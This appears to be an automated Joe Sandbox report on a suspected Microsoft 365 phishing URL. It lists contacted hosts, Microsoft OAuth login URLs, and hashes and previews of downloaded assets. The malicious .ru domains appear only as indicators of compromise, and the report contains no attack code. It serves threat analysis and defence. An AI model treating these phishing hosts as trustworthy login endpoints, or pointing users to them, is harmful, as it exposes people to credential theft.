                                      https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638720503531459396.MWEwM2ZiNWYtNzYwZS00M2QwLWI1NTktYzg4MWI4ZTEwZDVmYzJiMjY3NjktNjcyYi00MDM5LTg0YWMtZjQwNTUxM2Q1ODc3&ui_locales=en-US&mkt=en-US&client-request-id=e5d1d38c-f5a9-4e16-baf0-571716780c29&state=smvEroIhxhJZuKHMS0irUFUjVSKE_2RAh1UVyz1MOIMslNOK5B_XcmTAiLd2btOw-TOLMYnIJdLuX9dZ3FUmsXLoEYlqBx3njIWP7CjherfkD-V7XeWMgh4S1K48NDaW4b_9QBGFHyjq64-NewXEgj4ftiJK2Y3pcw3fM2l7v8clMdp94RfrlNIpScQa2uiXHK2Frl8J2aEHUN7KTWqSZf8247LVdRY6v7EwF4BcHOuevSVhpZhoznGC6D6qt0LkTDGuWJOlsbxfFLyuLbqtZw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=truefalse
                                        high
                                        https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638720503531459396.MWEwM2ZiNWYtNzYwZS00M2QwLWI1NTktYzg4MWI4ZTEwZDVmYzJiMjY3NjktNjcyYi00MDM5LTg0YWMtZjQwNTUxM2Q1ODc3&ui_locales=en-US&mkt=en-US&client-request-id=e5d1d38c-f5a9-4e16-baf0-571716780c29&state=smvEroIhxhJZuKHMS0irUFUjVSKE_2RAh1UVyz1MOIMslNOK5B_XcmTAiLd2btOw-TOLMYnIJdLuX9dZ3FUmsXLoEYlqBx3njIWP7CjherfkD-V7XeWMgh4S1K48NDaW4b_9QBGFHyjq64-NewXEgj4ftiJK2Y3pcw3fM2l7v8clMdp94RfrlNIpScQa2uiXHK2Frl8J2aEHUN7KTWqSZf8247LVdRY6v7EwF4BcHOuevSVhpZhoznGC6D6qt0LkTDGuWJOlsbxfFLyuLbqtZw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0false
                                          high
                                          https://challenges.cloudflare.com/turnstile/v0/b/e0c90b6a3ed1/api.jsfalse
                                            high
                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8ff714c8fb27c325/1736453537880/TCoQzFc-1Z86YKlfalse
                                              high
                                              https://cesinc365.xemitronax.ru/9FAvn/true
                                                unknown
                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8ff714c8fb27c325/1736453537883/03831841271b98307c37aaa89aea0ab835898c545ed3320b0501ee93361c0c92/7XzLK_UGDfcbQyzfalse
                                                  high
                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/pzzoe/0x4AAAAAAA3bgXiDXCFJKrv3/auto/fbE/normal/auto/false
                                                    high
                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8ff714c8fb27c325&lang=autofalse
                                                      high
                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://login.microsoftonline.comchromecache_71.2.dr, chromecache_79.2.drfalse
                                                        high
                                                        https://login.windows-ppe.netchromecache_71.2.dr, chromecache_79.2.drfalse
                                                          high
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          104.18.94.41
                                                          unknownUnited States
                                                          13335CLOUDFLARENETUSfalse
                                                          151.101.130.137
                                                          code.jquery.comUnited States
                                                          54113FASTLYUSfalse
                                                          151.101.194.137
                                                          unknownUnited States
                                                          54113FASTLYUSfalse
                                                          35.190.80.1
                                                          a.nel.cloudflare.comUnited States
                                                          15169GOOGLEUSfalse
                                                          142.250.74.196
                                                          www.google.comUnited States
                                                          15169GOOGLEUSfalse
                                                          104.17.24.14
                                                          cdnjs.cloudflare.comUnited States
                                                          13335CLOUDFLARENETUSfalse
                                                          104.18.95.41
                                                          challenges.cloudflare.comUnited States
                                                          13335CLOUDFLARENETUSfalse
                                                          172.67.195.229
                                                          jkas2k7pqn0lq86hseh0rkrzcqgauwj21bi4kj4y8r6c1tblsmxgt5ffcd0e.sprocubseq.ruUnited States
                                                          13335CLOUDFLARENETUSfalse
                                                          239.255.255.250
                                                          unknownReserved
                                                          unknownunknownfalse
                                                          188.114.96.3
                                                          unknownEuropean Union
                                                          13335CLOUDFLARENETUSfalse
                                                          104.17.25.14
                                                          unknownUnited States
                                                          13335CLOUDFLARENETUSfalse
                                                          IP
                                                          192.168.2.4
                                                          Joe Sandbox version:42.0.0 Malachite
                                                          Analysis ID:1587009
                                                          Start date and time:2025-01-09 21:11:02 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 3m 17s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:browseurl.jbs
                                                          Sample URL:http://cesinc365.xemitronax.ru/9FAvn/
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:8
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal60.win@21/68@38/12
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                          • Excluded IPs from analysis (whitelisted): 142.250.186.46, 66.102.1.84, 142.250.185.227, 172.217.18.14, 142.250.181.238, 142.250.185.142, 217.20.57.36, 192.229.221.95, 142.250.184.206, 142.250.186.174, 40.126.32.136, 40.126.32.68, 20.190.160.20, 20.190.160.14, 40.126.32.74, 20.190.160.22, 20.190.160.17, 40.126.32.133, 13.107.6.156, 40.126.32.76, 40.126.32.72, 40.126.32.138, 40.126.32.140, 142.250.185.106, 172.217.18.106, 142.250.74.202, 142.250.185.138, 142.250.185.170, 142.250.186.42, 142.250.184.234, 216.58.206.42, 216.58.206.74, 172.217.23.106, 172.217.18.10, 216.58.212.170, 142.250.186.74, 142.250.186.138, 172.217.16.202, 142.250.185.74, 20.50.73.13, 172.217.16.206, 20.50.80.210, 142.250.185.174, 216.58.206.78, 20.190.159.2, 40.126.31.69, 40.126.31.71, 20.190.159.68, 20.190.159.75, 20.190.159.64, 40.126.31.67, 20.190.159.23, 142.250.185.163, 142.250.185.78, 142.250.185.206, 2.18.64.215, 2.18.64.220, 23.56.254.164, 20.12.23.50, 13.107.246.45, 13.107.246.61
                                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, home-office365-com.b-0004.b-msedge.net, onedscolprdneu10.northeurope.cloudapp.azure.com, ak.privatelink.msidentity.com, a1894.dscb.akamai.net, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, login.live.com, update.googleapis.com, login.mso.msidentity.com, www.tm.ak.prd.aadg.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, aadcdnoriginwus2.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, b-0004.b-msedge.net, ctldl.windowsupdate.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, login.msa.msidentity.com, eu.events.data.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, onedscolprdneu05.northeurope.cloudapp.azure.com, nel.measure.office.net.edgesuite.net, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com, www.tm.lg.prod.aadmsa.trafficmanager.net, eu-mobile.e
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • VT rate limit hit for: http://cesinc365.xemitronax.ru/9FAvn/
                                                          No simulations
                                                          No context
                                                          No context
                                                          No context
                                                          No context
                                                          No context
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (48316), with no line terminators
                                                          Category:downloaded
                                                          Size (bytes):48316
                                                          Entropy (8bit):5.6346993394709
                                                          Encrypted:false
                                                          SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                          MD5:2CA03AD87885AB983541092B87ADB299
                                                          SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                          SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                          SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                          Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113424
                                                          Category:downloaded
                                                          Size (bytes):20410
                                                          Entropy (8bit):7.980582012022051
                                                          Encrypted:false
                                                          SSDEEP:384:8RvmaMFysnOXZ2m9zM+udO6GGUpeAU02oDGnN5EsQwWUQGTS8r2k:8pmm7ZFM+ObGGUIjN5PJV3Tp
                                                          MD5:3BA4D76A17ADD0A6C34EE696F28C8541
                                                          SHA1:5E8A4B8334539A7EAB798A7799F6E232016CB263
                                                          SHA-256:17D6FF63DD857A72F37292B5906B40DC087EA27D7B1DEFCFA6DD1BA82AEA0B59
                                                          SHA-512:8DA16A9759BB68A6B408F9F274B882ABB3EE7BA19F888448E495B721094BDB2CE5664E9A26BAE306A00491235EB94C143E53F618CCD6D50307C3C7F2EF1B4455
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css
                                                          Preview:...........}k..6..w...R..J.H=GSI..x.9...}T*.....)Q..f<...~.F.h..x..{+.-.....h..n....</v.ev......W.,.bU..rW.I...0x...C..2...6]..W_......../x.........~.z.}.|.#x......Ag*O.|XgU...4 .^'U...mP.A.].Z.U.!..Y.......:.ve.?.!..d.N...xJ...mR......0.@p...lKr/...E.-. .....|l.4.o.i.......L.iF..T{.n....2....VEY.y=..=..T+V./.b....\....7.sH.w{.h.....!.."F.k.!.......d...mS.rh.&G.../..h&..RE"!.A/.......A....L...8.q.M...t[...R...>.6;R..^.Vu..9.[F........>A.:HT}w]......2........p......'T.^]}.^..yJ>.<..pq..h.|..j....j.x..-...c...f...=".)..U.X'.M..l.]ZVtl\.I..}.0.~B0Y'.N...E.4.Xd..e...a.........."..9+d.&..l.$E..R.u.g.Q..w&...~I. .y..D.4;..'.."-.....b...)k.n.M...,3J.z_..&2f.h;.&.R.y..P..X.....\P....*.r...B.$........<....H5.M.."'#.6mQl..mQ5.=.\...O.....^..jM..u*.F..Oh.lNI..j..T..u...I..._........{.\...{..._|..={O..z..>......x..5Q.D7?{...^...^.......o.=.z......v......z.C...Gtw...0!..M@....^...^.x..G....W...{...)..y.<c3...^>{......7._..'d__...;R.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:GIF image data, version 89a, 352 x 3
                                                          Category:downloaded
                                                          Size (bytes):2672
                                                          Entropy (8bit):6.640973516071413
                                                          Encrypted:false
                                                          SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                          MD5:166DE53471265253AB3A456DEFE6DA23
                                                          SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                          SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                          SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif
                                                          Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (65447)
                                                          Category:downloaded
                                                          Size (bytes):89501
                                                          Entropy (8bit):5.289893677458563
                                                          Encrypted:false
                                                          SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                          Category:dropped
                                                          Size (bytes):5525
                                                          Entropy (8bit):7.961202222662501
                                                          Encrypted:false
                                                          SSDEEP:96:dySl6/e7OAQD3cS66g8cxO4qXgy66F0+fgENU28TjN3KY6meSsj0ktMvB4YJix2I:dNl6/zFDW6dlXV665ReB67j0sEBWxl
                                                          MD5:28CE5BF8BACB96D1C2CFA0092145C6EE
                                                          SHA1:303A4629C4467AF2C551EC9E6353464C8C25827D
                                                          SHA-256:6B89EEC14865DB53FE20FB3C70B0853362E21669DACE19C06172F673B2EDC5CD
                                                          SHA-512:6A10794F105EF5C6F7F7DC2C89152A8342E6D9D8D9490783863ED2737FFD5982E916F72E0A9ECB944AB9815FA70BD20C7256A91E2A62D971F80C23822B809A02
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:...........[}w.F....Bh..i3.M.t.rU.....]..M...@.(..........@..N..I-k..;w.....U.F..v....N....]....MC......U.]o>..mJ.w..~.5<......Z.h~8..8J..m......0.&Z:.Z.D_. .Z.....<.f..t..].I:..........b. ...}.ja......'..x......m6..c...$..........b|s......O.a..cE..u.2.*.6jG!.A.....P..?q@?"..).Mk.0.[."V..M..4...4.~}.?.i..D.}h|..$x.Ajm.S..H..-.x.If..]..1.D0.F......pq.(.|...y\...5....y2.q.Fq...[.|..n.b.i_D......xuR......I.TS.4..}|<...o....MG.+@.......\.?."...+[...A..&...{]......u..+p?......|...j....7...=H..cwp.38.;%c.....O..............p...X.g!....r...d..5.%x.....;...j6p...p......c.Nd.:...&.*....%.. tR.d.@.. ...1..6....i....:...s=..V...iN..1../tH..p<..Mo.......`&.7uA;..(lC.......4...?..0..[S@...D..|....=.wh2...<.. ...)..F...!. .C...k...S.pPt......s..K.V...w......7....Zn.d..t]l.........5=.(..#.....l._.Ip......-O.6.,......q4....!XS`6k..k.....9k....{~*.....X....q......l.>x..={j.n..W......e..Q..I/..;a..MS>.!5v.d.B+.o.....q...j.q..Z..=..@g.1q..,yBV91m.j>..4.o...
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                          Category:downloaded
                                                          Size (bytes):35170
                                                          Entropy (8bit):7.993096534744333
                                                          Encrypted:true
                                                          SSDEEP:768:K+LvEzA9nny7u0zF35Hm4ngomu6yeLDKDnccqmcmHvVVPCLVf:ny7f5GpuheL4htv3Pkf
                                                          MD5:171A4DD9400708B88724B57D62B24A6A
                                                          SHA1:9C6F1303B8F02FCE18D20EC9CADA11D38D0C4B37
                                                          SHA-256:EA00750636C11DBD4FA3ACB1B3CDCBAE3EFA43F6B6C3753444B6D6A242AE9336
                                                          SHA-512:5B13B63912B34E3EEEDD8DA5953B869A83DF82FFD2A8D737AA81DC984F1811800A534F340C48041DA803C25B6B8F5605EA8D003B6A09A1874408F95A710F5126
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_cc2c59f5ef2c09e14b08.js
                                                          Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........z.....|..t.. [.C.....{...~..c......ua...~.v<.I..P#._{{}._.......Km...eR....u?GY..h..}..gAv...<.l.Z...#.....:P?Q..."..........,.D...I<._.'..-..=..;.>.C_..#.....D[0.Y..*...M.....{.YT,...x..SQ/......N<`...|._.k....0)......+.Z..4...M. ...i...`.ml..-X.E.....d.. .}.e4.{6hz^..}....@....W.1...d8...>.@.....(.'[..`..A..?...yL.|..QTF...-.='S@.Q.sM.`...}.t..$..y^..0J.kC.S...U.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57510
                                                          Category:downloaded
                                                          Size (bytes):16345
                                                          Entropy (8bit):7.98960525258912
                                                          Encrypted:false
                                                          SSDEEP:384:hOBEj/gTOkWow6mhJqXnYI/0PiQBSoe122Yw/:hOBKJBXO586QB+11J
                                                          MD5:187B9EBA41FDF66B2C8F7EB645D2BC17
                                                          SHA1:B1C034F7F5F754F271D094FB417B9A820C1F712C
                                                          SHA-256:CA0FBF8421A0CF4CCDA7310B2AE74CBD92214901EC2D0F273EA3B07F12CF96EA
                                                          SHA-512:0D7FB682D24E97C9E3FC04AA87CCB8EC508CA0CF197DA0617EFFD981BC8B5E3600824FDD08F1F31F59D276B5BF53229D00805D984E01D512FD968610C5FE9609
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.js
                                                          Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 79 x 90, 8-bit/color RGB, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):61
                                                          Entropy (8bit):4.068159130770306
                                                          Encrypted:false
                                                          SSDEEP:3:yionv//thPl6ltnl4Bhkxl/k4E08up:6v/lhPWGXk7Tp
                                                          MD5:039F4DFE876EFFABF8D1D75BFAA86E6A
                                                          SHA1:E86EDFAA485021EC66FD374D5503E026C73863CB
                                                          SHA-256:B0C0A20B54136213114E128F55345A3C23A00C8892F996370C47E3214ADC4966
                                                          SHA-512:12CFEEBE819A89B986869BD7F397C0A62C8D057614A25FCACC41FB9CEB39B4C0A91A37403DF8727455BB75A22F4D491A1A579EFC291CA8534D7C78B0217D3BD0
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:.PNG........IHDR...O...Z.....vM......IDAT.....$.....IEND.B`.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                          Category:dropped
                                                          Size (bytes):673
                                                          Entropy (8bit):7.6596900876595075
                                                          Encrypted:false
                                                          SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                          MD5:0E176276362B94279A4492511BFCBD98
                                                          SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                          SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                          SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:GIF image data, version 89a, 352 x 3
                                                          Category:downloaded
                                                          Size (bytes):3620
                                                          Entropy (8bit):6.867828878374734
                                                          Encrypted:false
                                                          SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                          MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                          SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                          SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                          SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif
                                                          Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                          Category:dropped
                                                          Size (bytes):17174
                                                          Entropy (8bit):2.9129715116732746
                                                          Encrypted:false
                                                          SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                          MD5:12E3DAC858061D088023B2BD48E2FA96
                                                          SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                          SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                          SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                          Malicious:false
                                                          Reputation:low
